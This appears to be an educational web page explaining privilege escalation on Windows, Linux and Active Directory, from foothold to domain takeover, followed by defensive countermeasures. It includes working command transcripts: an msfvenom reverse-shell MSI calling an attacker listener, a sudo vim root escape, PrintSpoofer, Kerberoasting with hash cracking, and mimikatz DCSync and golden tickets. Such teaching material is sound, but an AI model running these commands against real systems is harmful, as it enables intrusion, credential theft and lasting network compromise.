ATT&CK Techniques T1068 / T1078 / T1548 - Privilege Escalation

PRIVILEGE ESCALATION

After initial compromise, attackers exploit system weaknesses, misconfigurations, and stolen credentials to climb from low-privilege access to full system or domain control.

HIGH SEVERITY - POST-EXPLOITATION STAGE

Primary Target

SYSTEM

NT AUTHORITYSYSTEM or root - highest OS-level access

ATT&CK Techniques

40+

MITRE-catalogued escalation methods across Windows & Linux

Key Prerequisite

LOW

Any initial foothold - even a limited user account suffices

End Goal

Domain Admin - full control over Active Directory environment

Access Hierarchy

HOVER EACH TIER TO INSPECT

DOMAIN ADMIN Owns entire AD forest APEX TARGET

↑

NT AUTHORITY\SYSTEM Unrestricted local OS access CRITICAL

↑

LOCAL ADMINISTRATOR Full local machine control HIGH

↑

STANDARD USER Limited OS access + privs MEDIUM

↑

GUEST / ANON Minimal to no privileges ENTRY POINT

ESCALATION PATHS

🪟

WINDOWS VECTORS

UAC bypass, Token impersonation, Unquoted service paths, DLL hijacking, Kernel exploits, AlwaysInstallElevated, Scheduled tasks

🐧

LINUX VECTORS

SUID/SGID binaries, sudo misconfig, Cron job abuse, PATH hijacking, Kernel exploits, Docker escape, Capabilities abuse

☁️

CLOUD / AD VECTORS

Kerberoasting, AS-REP roasting, ACL abuse, DCSync, Golden/Silver Ticket, RBCD, IAM misconfiguration

KEY INSIGHT

Attackers rarely need a zero-day. Over 80% of real-world escalations exploit misconfigurations, excessive permissions, or credential reuse - not software vulnerabilities.

Attack Flow Diagram

Step-by-Step Walkthrough

Phase 01 - Initial Compromise

ESTABLISHING A FOOTHOLD

CURRENT LEVEL → GUEST / LOW USER

Privilege escalation begins after the attacker gains any access to a system - a phishing payload, an exploited service, or a stolen credential. The initial shell is typically unprivileged, and the race to escalate begins immediately.

Initial shell may be a web shell, reverse shell, or interactive session
Service account shells (IIS, Apache) often have limited but exploitable privileges
First actions: stabilize shell, check current user and privileges
Identify OS, patch level, and installed security tools
Silence logs and evade detection before proceeding

reverse_shell - initial access

$ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ whoami /priv Privilege Name Description State SeChangeNotifyPrivilege Bypass traverse... Enabled SeImpersonatePrivilege Impersonate client Enabled $ systeminfo | findstr /B /C:"OS" OS Name: Microsoft Windows Server 2019 [+] SeImpersonatePrivilege found - Potato attack viable

Phase 02 - Local Reconnaissance

PRIVILEGE ENUMERATION

CURRENT LEVEL → STANDARD USER

Before exploiting, the attacker maps every escalation surface on the system. Automated tools like WinPEAS and LinPEAS scan hundreds of misconfiguration categories in seconds, revealing attack paths invisible to manual inspection.

WinPEAS/LinPEAS - comprehensive PrivEsc enumeration scripts
Check SUID/SGID binaries, sudo -l, writable service paths
Enumerate scheduled tasks, cron jobs, and startup programs
Identify unpatched CVEs via patch level and kernel version
Search for credentials in config files, environment vars, registry

winpeas - local enumeration

$ .winPEASx64.exe quiet ════════════ Interesting Services ═══════════ VulnSvc - Unquoted path: C:Program FilesVuln Appservice.exe WebApp - Runs as: NT AUTHORITYSYSTEM ! ════════════ AlwaysInstallElevated ══════════ HKLM: 1 ← VULNERABLE HKCU: 1 ← VULNERABLE ════════════ Credentials in Files ═══════════ C:inetpubwwwrootweb.config - password found! [*] 3 escalation paths discovered

Phase 03 - Windows Escalation

WINDOWS PRIVESC

ESCALATING TO → LOCAL ADMINISTRATOR

Windows offers a vast attack surface for privilege escalation. Misconfigurations in services, registry keys, and installation policies frequently allow an attacker to gain Administrator or SYSTEM privileges without a kernel exploit.

Unquoted Service Path - place malicious binary in path gap
AlwaysInstallElevated - craft malicious MSI for SYSTEM shell
Weak Service Permissions - replace or modify service binary
UAC Bypass - Fodhelper, eventvwr, CMSTP auto-elevation
DLL Hijacking - drop malicious DLL in privileged search path

msfvenom + service path exploit

# AlwaysInstallElevated - MSI payload $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f msi -o priv.msi Payload size: 7168 bytes → priv.msi C:> msiexec /quiet /qn /i priv.msi # On listener: connect from 10.10.10.25:49852 C:Windowssystem32> whoami NT AUTHORITYSYSTEM ✓

Phase 03 - Linux Escalation

LINUX PRIVESC

ESCALATING TO → ROOT

Linux escalation commonly exploits SUID binaries, misconfigured sudo rules, writable cron jobs, and abusable Linux capabilities. GTFOBins documents hundreds of legitimate tools that can be abused for privilege escalation.

SUID binary abuse - find / -perm -4000 → use GTFOBins technique
sudo -l misconfig - NOPASSWD entries on shells, editors, scripts
Writable /etc/passwd - add root-level user with known password
Cron PATH hijack - prepend writable path before root cron scripts
Docker group - mount host FS via privileged container escape

linux - sudo misconfiguration exploit

$ sudo -l User www-data may run the following: (ALL) NOPASSWD: /usr/bin/vim # GTFOBins: vim sudo escape $ sudo vim -c ':/bin/bash' root@target:~# id uid=0(root) gid=0(root) groups=0(root) root@target:~# cat /etc/shadow root:$6$xyz...:19800:0:99999:7:::

Phase 04 - Token Manipulation

TOKEN IMPERSONATION

ESCALATING TO → NT AUTHORITYSYSTEM

Windows access tokens are the OS objects that define a process's security context. With SeImpersonatePrivilege, attackers can steal or forge high-privilege tokens and attach them to new processes - bypassing all credential-based controls.

Potato family - PrintSpoofer, RoguePotato, SweetPotato force SYSTEM token via NTLM coercion
Incognito / Meterpreter - list and impersonate available tokens in memory
Service accounts (IIS, MSSQL) commonly hold SeImpersonatePrivilege
Token duplication: OpenProcessToken → DuplicateTokenEx → CreateProcessWithTokenW
Often the fastest path to SYSTEM in a Windows web server environment

PrintSpoofer - token impersonation

C:> whoami iis apppooldefaultapppool C:> .PrintSpoofer64.exe -i -c cmd [+] Found privilege: SeImpersonatePrivilege [+] Named pipe listening... [+] Impersonated NT AUTHORITYSYSTEM [+] Launching cmd.exe as SYSTEM C:Windowssystem32> whoami nt authoritysystem ✓

Phase 05 - Active Directory

AD PRIVILEGE ESCALATION

ESCALATING TO → DOMAIN ADMIN

Active Directory escalation abuses Kerberos, ACL misconfigurations, and delegation settings to elevate domain privileges. These attacks rarely trigger traditional security tools because they use legitimate protocol features.

Kerberoasting - request TGS for SPNs, offline crack service account hashes
AS-REP Roasting - attack accounts with pre-auth disabled
ACL Abuse - GenericWrite/GenericAll on high-privilege objects
Resource-Based Constrained Delegation (RBCD) - forge service tickets
GPO abuse - modify Group Policy applied to Domain Admins OU

Rubeus + Hashcat - Kerberoasting

# Request service tickets for all SPNs C:> Rubeus.exe kerberoast /outfile:hashes.txt [*] Found 3 roastable user(s) svc_sql / krb5tgs$23$*svc_sql$... # Crack offline - no domain interaction $ hashcat -m 13100 hashes.txt rockyou.txt svc_sql:Summer2024! # svc_sql is member of Domain Admins! CORPsvc_sql → Domain Admins ✓

Phase 06 - Domain Dominance

DOMAIN ADMIN ACHIEVED

CURRENT LEVEL → DOMAIN ADMINISTRATOR

Domain Admin privilege means complete organizational compromise. The attacker can create persistent backdoor accounts, forge Kerberos tickets, replicate all password hashes, and access every system across the domain indefinitely.

DCSync - replicate all NTLM hashes from the Domain Controller
Golden Ticket - forge TGTs using krbtgt hash for permanent access
Skeleton Key - patch LSASS on DC to accept universal password
Create hidden backdoor admin accounts for persistence
Disable security tools, tamper with logs, establish C2 tunnels

mimikatz - golden ticket + persistence

# DCSync - pull krbtgt hash mimikatz # lsadump::dcsync /user:krbtgt * Primary: NTLM hash: 31d6cfe0d16ae931... # Forge Golden Ticket mimikatz # kerberos::golden /user:backdoor /domain:corp.local /sid:S-1-5-21-... /krbtgt:31d6cfe0... Golden ticket for 'backdoor @ corp.local' successfully submitted [!] Permanent domain access established. [!] Organization FULLY COMPROMISED ✓

STEP 1 OF 7

Common Attack Vectors

🎰

Kernel Exploits

CVE-BASED - HIGH RELIABILITY

Unpatched OS vulnerabilities allow direct ring-0 code execution. Examples: DirtyPipe (CVE-2022-0847), PrintNightmare (CVE-2021-1675), Dirty COW, EternalBlue. Brutal but noisy.

🔧

Service Misconfigurations

WINDOWS - VERY COMMON

Unquoted service paths, weak ACLs on service binaries, and modifiable service registry keys allow replacement of the binary executed as SYSTEM.

🍟

Potato Attacks

WINDOWS - SEIMPERSONATEPRIVILEGE

PrintSpoofer, RoguePotato, SweetPotato, JuicyPotato. Coerce SYSTEM-level NTLM authentication over a local named pipe and impersonate the token. Works on service accounts.

📋

Sudo Misconfigurations

LINUX - EXTREMELY COMMON

NOPASSWD sudo rules for shells, editors (vi, nano), or scripting languages give immediate root. GTFOBins documents escape techniques for over 300 binaries.

🎫

Kerberoasting / AS-REP

ACTIVE DIRECTORY

Request TGS tickets for SPN-registered accounts, then crack them offline with no lockout risk. Weak service account passwords often reveal DA membership.

🔗

ACL / Delegation Abuse

ACTIVE DIRECTORY

Misconfigured AD object permissions (GenericWrite, WriteDACL, ForceChangePassword) allow an attacker to take control of high-privilege accounts or add themselves to privileged groups.

Defensive Countermeasures

🔒

Principle of Least Privilege

Grant only the minimum permissions required. Remove SeImpersonatePrivilege from service accounts. Restrict local admin to IT staff. Audit and remove excessive ACLs in Active Directory via BloodHound.

🩹

Aggressive Patch Management

Apply OS and service patches within days, not weeks. Kernel exploits require an unpatched system. Most PrivEsc CVEs have patches available - exploit timelines show rapid weaponization after disclosure.

🛡️

Windows Credential Guard + PPL

Credential Guard isolates LSASS in virtualization-based security. Protected Process Light (PPL) prevents unauthorized LSASS memory reads, blocking Mimikatz and similar credential dumping tools.

🏛️

AD Tiered Administration

Enforce Tier 0/1/2 model: Domain Admin credentials only touch Tier 0 (DCs). Prevents credential exposure on workstations. Use Privileged Access Workstations (PAW) for all admin tasks.

📊

EDR + Behavioral Detection

Modern EDR detects PrivEsc tooling via behavioral signals: LSASS access patterns, suspicious token duplication APIs, anomalous MSI installs, and Kerberos ticket request patterns that indicate Kerberoasting.

🔍

Regular PrivEsc Auditing

Run BloodHound AD attack path analysis, review sudo rules and SUID binaries periodically. Use tools like PrivescCheck and PEASS to assess your own environment before attackers do.

🎭

Application Control (WDAC/AppLocker)

Prevent execution of unauthorized tools like Mimikatz, WinPEAS, and Potato binaries. WDAC (Windows Defender Application Control) enforces allowlisting at the kernel level, blocking unsigned payloads.

🔐

Service Account Hygiene

Use Group Managed Service Accounts (gMSA) for automatic password rotation. Ensure SPNs are only set on accounts that need them. Strong, random 25+ character service account passwords defeat Kerberoasting.